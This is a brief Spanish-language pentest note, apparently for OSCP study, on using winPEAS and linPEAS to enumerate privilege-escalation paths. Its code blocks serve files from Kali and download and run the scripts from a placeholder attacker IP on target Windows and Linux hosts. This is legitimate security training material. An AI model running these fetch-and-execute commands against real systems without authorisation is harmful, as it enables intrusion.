# PEASS-ng (winPEAS / linPEAS) > Scripts que **enumeran automáticamente** todos los vectores de privesc. En `tu carpeta`. ## Subir y ejecutar ```bash # Kali (servir): cd tu carpeta && python3 -m http.server 80 → Transferencia de ficheros ``` ```powershell # Windows: iwr http://TU_IP/winPEASx64.exe -OutFile C:\Windows\Temp\wp.exe ; C:\Windows\Temp\wp.exe ``` ```bash # Linux: wget http://TU_IP/linpeas.sh -O /tmp/lp.sh ; bash /tmp/lp.sh ``` ## Regla de oro **Automatizado + manual.** winPEAS resalta lo sospechoso (rojo/amarillo), pero **revisa a mano** Privesc Windows / Privesc Linux: winPEAS no encuentra todo (ej. lógica de un script cron concreto). Relacionado: GTFOBins y LOLBAS · Metodología OSCP · OSCP MOC